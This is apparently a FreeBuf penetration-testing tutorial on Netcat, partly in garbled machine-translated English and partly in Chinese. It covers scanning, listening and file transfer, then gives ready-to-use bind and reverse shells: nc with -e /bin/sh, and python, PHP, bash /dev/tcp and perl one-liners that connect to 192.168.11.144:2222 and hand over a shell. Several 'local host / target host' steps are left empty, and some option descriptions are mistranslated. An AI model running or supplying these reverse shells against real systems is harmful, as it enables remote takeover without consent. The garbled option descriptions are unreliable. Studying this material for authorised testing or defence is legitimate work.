"Swiss Army Knife" Netcat usage summary

Foreword

Recently doing a penetration test when it came to the issue rebound port monitoring and shell, and in the process she had a new understanding of an artifact that Netcat, Netcat usage of some now do a little summary, I hope to help you !

Netcat Profile

Netcat is a very well-known networking tools, referred to as "NC", has a penetration test of the "Swiss Army knife," he said. It can be used as port monitoring, port scanning, remote file transfer, remote shell also allows other functions. In short powerful, powerful NC can be described with a more humorous words - "Your imagination is a limitation of the NC bottleneck."

Netcat Options Parameter Description

 

Function: port scanning, port monitoring, remote file transfer, remote shell, and so on;

Syntax: NC [-hlnruz] [- G <gateway ...>] [- G <pointer number>] [- i <seconds delay>] [- o <output file>] [- p <communications port> ] [- s <source address>] [- v ...] [ - w < timeout in seconds>] [host name] [communication port ...]

Participation number:

-g <gateway> Set the communication gateway router hops, can be set up to eight;

 -G <point number> Settings Source route point, a value which is a multiple of 4;

 -h online help; 

-i <delay in seconds> set the time interval in order to transfer the scanning information and communication ports;

 -l use a listening mode, incoming data management and control;

 -n IP address directly, without passing through the domain name server;

 -o <output file> specify the file name, the transmission of data to and from the word hexadecimal dump to save the file;

 -p <communications port> Set the communication port used by the local host;

 -r nonce specify a communications port of the local and remote host;

 -s <Source address> set local host IP address of the packet sent;

 -u UDP transport protocol used;

 -v display process execution instruction;

 -w <timeout in seconds> connection set waiting time;

 Use -z 0 input / output mode, only the communication port during the scan.

Netcat简易使用

连接到远程主机

 

命令：nc  -nvv Targert_IP  Targert_Port

 

监听本地主机

 

命令：nc  -l  -p  Local_Port

 

端口扫描

扫描指定主机的单一端口是否开放

 

格式：nc  -v  target_IP  target_Port

 

扫描指定主机的某个端口段的端口开放信息

 

格式：nc  -v  -z  Target_IP   Target_Port_Start  -  Target_Port_End

 

扫描指定主机的某个UDP端口段，并且返回端口信息

 

格式：nc -v   -z  -u  Target_IP  Target_Port_Start   -   Target_Port_End

 

扫描指定主机的端口段信息，并且设置超时时间为3秒

 

格式：nc  -vv（-v） -z  -w  time  Target_IP   Target_Port_Start-Targert_Port_End

 

端口监听

监听本地端口

 

格式：nc  -l  -p  local_Port

 

注：先设置监听（不能出现端口冲突），之后如果有外来访问则输出该详细信息到命令行

监听本地端口，并且将监听到的信息保存到指定的文件中

 

格式：nc -l  -p local_Port > target_File

连接远程系统

 

格式：nc Target_IP  Target_Port

 

之后可以运行HTTP请求

FTP匿名探测

 

格式：nc Targert_IP  21

 

文件传输

传输端：

 

格式：nc  Targert_IP  Targert_Port  <  Targert_File

 

接收端：

 

格式：nc   -l  Local_Port  >  Targert_File

 

简易聊天

本地主机

命令：nc   -l   8888

远程主机

命令：nc Targert_IP    Targert_Port

蜜罐

作为蜜罐使用1：

命令：nc -L -p  Port

注：使用“-L”参数可以不停的监听某一个端口，知道Ctrl+C为止

作为蜜罐使用2：

命令：nc -L -p  Port >log.txt

注：使用“-L”参数可以不停的监听某一个端口，知道Ctrl+C为止，同时把结果输出到log.txt文件中，如果把“>”改为“>>”即追加到文件之后。

这一个命令参数“-L”在Windows中有，现在的Linux中是没有这个选项的，但是自己可以去找找，这里只是想到了之前的这个使用，所以提出来简单介绍一下！

获取shell

简述：获取shell分为两种，一种是正向shell，一种是方向shell。如果客户端连接服务器端，想要获取服务器端的shell，那么称为正向shell，如果是客户端连接服务器，服务器端想要获取客户端的shell，那么称为反向shell

正向shell

本地主机：

命令：nc   Targert_IP  Targert_Port 

目标主机：

命令：nc  -lvp  Targert_Port   -e  /bin/sh  

反向shell

本地主机：

命令： nc -lvp  Target_Port

目标主机：

命令： nc  Targert_IP Targert_Port  -e /bin/sh

Special circumstances - on the target host is not Netcat, how to get a reverse shell

Under normal circumstances, generally do not have the Netcat on the target host, then you need to use alternative methods to achieve the purpose of backlinks attacking host, following a brief introduction of several reverse shell settings.

python reverse shell

Target host execute the statement:

 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

local host

Target host

PHP reverse shell

Target host execute the statement:

 

php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'

local host:

 

Destination Host:

Bash reverse shell

Target host execute the statement:

bash -i>＆/dev/tcp/192.168.11.144/2222 0>＆1

local host:

Destination Host:

Perl reverse shell

Target host execute the statement:

 

 

perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

local host

 

Target host

 

NOTE: Writing must pay attention to this single quotes, double quotes in English format, or will report wrong!

Summary: There is a saying as "Reviewing the Old", while another word is "practice makes perfect", when the two sentences at the same time to practice, it will wipe out different spark, you will see your not seen before, to master the skills before you strange! Netcat of course, easy to use, but also through practice to know, what are you waiting for?

* The author: Fly a bright future, please indicate from FreeBuf.COM